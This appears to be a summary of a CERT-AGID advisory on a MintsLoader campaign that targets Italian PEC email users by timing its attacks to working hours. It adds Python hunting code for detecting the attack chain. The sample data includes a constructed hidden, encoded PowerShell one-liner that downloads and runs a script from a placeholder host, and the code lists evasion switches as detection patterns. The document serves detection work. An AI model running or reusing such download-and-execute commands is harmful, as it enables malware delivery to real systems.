New MintsLoader Campaign Confirms a Targeted Temporal Strategy

A new wave of the MintsLoader campaign, the ninth detected in 2025, shows how the operators adapt their timing to the Italian working calendar and national holidays. The campaign uses PowerShell-based loaders and compromised PEC (certified email) accounts to distribute infostealer malware, with evasion measures that also complicate analysis.

Keypoints

  • The ninth MintsLoader campaign of 2025 was observed; it tracks Italian work schedules and holidays, this time launching on a Wednesday rather than the usual Monday.
  • The change in timing followed the national holiday of June 2nd (Festa della Repubblica), which fell on the Monday and removed the week's usual first working day.
  • The timing targets PEC (certified email) users at the moment they return from a break and are most likely to be working through accumulated work-related messages.
  • The infection chain starts with PEC emails carrying links to obfuscated JavaScript files; the JavaScript in turn launches the PowerShell-based MintsLoader.
  • A Domain Generation Algorithm (DGA) produces the malicious domains dynamically, and the domains are only activated during working hours, which reduces exposure to detection outside that window.
  • Retrieving the final payload has become harder because of strict server-side controls on what the distribution servers will serve, which complicates malware analysis.
  • Countermeasures include collaboration with PEC providers and distribution of Indicators of Compromise (IoCs) through CERT-AGID feeds; users are asked to report suspicious PEC emails to [email protected].
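The keypoints above describe the chain PEC email, link, obfuscated JavaScript, PowerShell, MintsLoader. The Python below is an added example, not code from CERT-AGID or from the campaign, showing how a detection engineer might hunt for that chain in process-creation telemetry (Sysmon Event ID 1 style fields: Image, CommandLine, ParentImage, ParentCommandLine). The sample events, the encoded PowerShell one-liner and the lists of switch spellings are this example's own constructed assumptions.

```python
"""
Hunt for the PEC-delivered JavaScript -> PowerShell loader chain in
process-creation telemetry (Sysmon Event ID 1 style fields).
Added example: the events and the encoded payload below are constructed.
"""
import base64
import shlex
from typing import Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows Script Host engines
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Switch spellings are this example's assumption of common evasion forms.
ENCODED = {"-e", "-ec", "-enc", "-encodedcommand"}
NO_PROFILE = {"-nop", "-noprofile"}
WINDOW_STYLE = {"-w", "-win", "-windowstyle"}
EXEC_POLICY = {"-ep", "-executionpolicy"}

# Constructed loader one-liner; example.invalid is a reserved, unresolvable name.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/l')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed, not campaign telemetry
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell.exe -w hidden -nop -ep bypass -enc {SAMPLE_ENCODED}",
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "ParentCommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\utente\Downloads\documento.js"',
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r"cmd.exe /c C:\Scripts\nightly.cmd",
    },
]


def basename(path: str) -> str:
    """Last path component, lower-cased; accepts / or \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def tokenize(command_line: str) -> list:
    """Split a Windows command line; posix=False keeps backslashes literal.
    Case is preserved because a base64 argument must not be altered."""
    try:
        tokens = shlex.split(command_line, posix=False)
    except ValueError:                  # unbalanced quotes: fall back to whitespace
        tokens = command_line.split()
    return [t.strip('"') for t in tokens]


def powershell_flags(command_line: str) -> list:
    """Evasion-style switches present on a PowerShell command line, in order."""
    tokens = tokenize(command_line)
    found = []
    for i, tok in enumerate(tokens):
        low = tok.lower()
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if low in ENCODED:
            found.append("encoded-command")
        elif low in NO_PROFILE:
            found.append("no-profile")
        elif low in WINDOW_STYLE and nxt == "hidden":
            found.append("hidden-window")
        elif low in EXEC_POLICY and nxt in {"bypass", "unrestricted"}:
            found.append(f"execution-policy-{nxt}")
    return found


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text)."""
    tokens = tokenize(command_line)
    for i, tok in enumerate(tokens):
        if tok.lower() in ENCODED and i + 1 < len(tokens):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(event: dict) -> tuple:
    """Score one event; a script-host parent is the strongest single signal."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    score, reasons = 0, []
    if image in POWERSHELL:
        if parent in SCRIPT_HOSTS:
            score += 5
            reasons.append(f"powershell spawned by {parent}")
        for flag in powershell_flags(event["CommandLine"]):
            score += 2
            reasons.append(flag)
    if parent in SCRIPT_HOSTS and ".js" in event.get("ParentCommandLine", "").lower():
        score += 1
        reasons.append("script host was running a .js file")
    return score, reasons


def hunt(events: list, threshold: int = 5) -> list:
    """Events at or above threshold, with reasons and any decoded payload."""
    hits = []
    for ev in events:
        score, reasons = classify(ev)
        if score >= threshold:
            hits.append({"score": score, "reasons": reasons,
                         "decoded": decode_encoded_command(ev["CommandLine"]),
                         "command_line": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["score"], hit["reasons"])
        print("  decoded:", hit["decoded"])
```

The parent/child relationship carries most of the weight on purpose: individual switches such as -nop or -w hidden appear in plenty of legitimate automation, but PowerShell started by wscript.exe from a .js in a Downloads folder is rare outside a loader chain. Decoding the -EncodedCommand argument gives the analyst the actual download URL to pivot on.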

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – PowerShell (sub-technique T1059.001) runs the MintsLoader stage, while the initial obfuscated JavaScript stage falls under T1059.007 (JavaScript). ('PowerShell-based MintsLoader')
  • [T1566] Phishing – PEC emails carry links to obfuscated JavaScript files, i.e. Spearphishing Link (T1566.002). ('Sending emails containing links to obfuscated JavaScript files')
  • [T1483] Domain Generation Algorithms – the DGA generates the malicious domains dynamically and activates them during working hours. T1483 is a deprecated ATT&CK identifier; the current mapping is T1568.002 (Dynamic Resolution: Domain Generation Algorithms). ('Use of Domain Generation Algorithm (DGA) for dynamic malicious domain generation')

Indicators of Compromise

  • [Domains] Dynamic malicious domains generated by the campaign's DGA and activated during working hours (the specific domains are not reproduced in this summary; CERT-AGID publishes them in its IoC feed)
  • [File Names] Obfuscated JavaScript files, linked from PEC emails, used to initiate the infection
  • [Email] Compromised PEC accounts used to send the malicious emails
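The time-gated DGA behaviour (Keypoints, the T1483 entry and the Domains IoC above) can be surfaced from DNS query logs without knowing the generation algorithm, which this page does not describe. The Python below is an added example and not CERT-AGID code: it scores second-level labels with generic DGA heuristics, then splits the resolution outcome of suspicious names into working hours versus off hours, so names that answer only during the working day stand out. The log lines, the working-hours window (Monday to Friday, 08:00 to 18:59 local time) and the score threshold are constructed assumptions, and the heuristics are deliberately generic rather than a reconstruction of MintsLoader's real DGA.

```python
"""
Surface DGA-style domains that resolve only during working hours from DNS
query logs. Added example with constructed data; the heuristics are generic
and do not reproduce MintsLoader's actual generation algorithm.
"""
import math
from collections import Counter
from datetime import datetime

DGA_THRESHOLD = 3          # assumption: combined score needed to flag a name
WORK_HOURS = range(8, 19)  # assumption: 08:00-18:59 local time, Mon-Fri

# Constructed log lines: "<timestamp> <client> <qname> <rcode>"
SAMPLE_LOG = """\
2025-06-04T09:17:03 10.0.0.15 qkz7x2mwd9p4tr.top NOERROR
2025-06-04T09:17:05 10.0.0.15 login.microsoftonline.com NOERROR
2025-06-04T12:40:11 10.0.0.22 wq3pz8vkc5nhxd.top NOERROR
2025-06-04T21:03:44 10.0.0.15 qkz7x2mwd9p4tr.top NXDOMAIN
2025-06-05T02:15:09 10.0.0.22 wq3pz8vkc5nhxd.top NXDOMAIN
2025-06-05T10:05:30 10.0.0.9 pec.aruba.it NOERROR
""".splitlines()


def shannon_entropy(text: str) -> float:
    """Bits per character of the label; random-looking strings score high."""
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def second_level_label(qname: str) -> str:
    """Label left of the TLD ('abcxyz' for 'www.abcxyz.top'). Naive: it
    ignores multi-part public suffixes such as co.uk."""
    parts = qname.rstrip(".").lower().split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(qname: str) -> tuple:
    """Combine several weak signals. Entropy alone also fires on long
    legitimate labels such as 'microsoftonline', hence the combination."""
    label = second_level_label(qname)
    score, reasons = 0, []
    entropy = shannon_entropy(label)
    if len(label) >= 10 and entropy >= 3.0:
        score += 2
        reasons.append(f"entropy {entropy:.2f}")
    vowels = sum(label.count(v) for v in "aeiou")
    if len(label) >= 8 and vowels / len(label) < 0.2:
        score += 1
        reasons.append("few vowels")
    digits = sum(ch.isdigit() for ch in label)
    if digits >= 3 and any(ch.isalpha() for ch in label):
        score += 1
        reasons.append("letters mixed with digits")
    return score, reasons


def in_working_hours(ts: datetime) -> bool:
    """Monday to Friday within WORK_HOURS (naive local timestamps assumed)."""
    return ts.weekday() < 5 and ts.hour in WORK_HOURS


def analyze(lines: list) -> dict:
    """Per suspicious qname: DGA score and rcode counts inside/outside
    working hours."""
    report = {}
    for line in lines:
        ts_text, _client, qname, rcode = line.split()
        score, reasons = dga_score(qname)
        if score < DGA_THRESHOLD:
            continue
        entry = report.setdefault(
            qname, {"score": score, "reasons": reasons,
                    "working": Counter(), "off": Counter()})
        bucket = "working" if in_working_hours(datetime.fromisoformat(ts_text)) else "off"
        entry[bucket][rcode] += 1
    return report


def time_gated(report: dict) -> list:
    """Names that resolved during working hours and only failed outside them:
    the activation pattern described for this campaign."""
    return sorted(q for q, e in report.items()
                  if e["working"]["NOERROR"] and e["off"]["NXDOMAIN"]
                  and not e["off"]["NOERROR"])


if __name__ == "__main__":
    rep = analyze(SAMPLE_LOG)
    for name in time_gated(rep):
        e = rep[name]
        print(f"{name}: score {e['score']} ({', '.join(e['reasons'])}); "
              f"working={dict(e['working'])} off={dict(e['off'])}")
```

Two practical notes. First, the entropy signal on its own is a known false-positive source (long brand names score above 3 bits per character), which is why a name needs several signals before it is counted. Second, the working-hours split is only meaningful when the resolver logs carry the response code: a DGA name that is queried around the clock but answers only inside the working window looks exactly like the time-gated activation the advisory describes, whereas a name that never resolves is more likely an unregistered candidate.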


Read more: https://cert-agid.gov.it/news/nuova-campagna-mintsloader-conferma-una-mirata-strategia-temporale/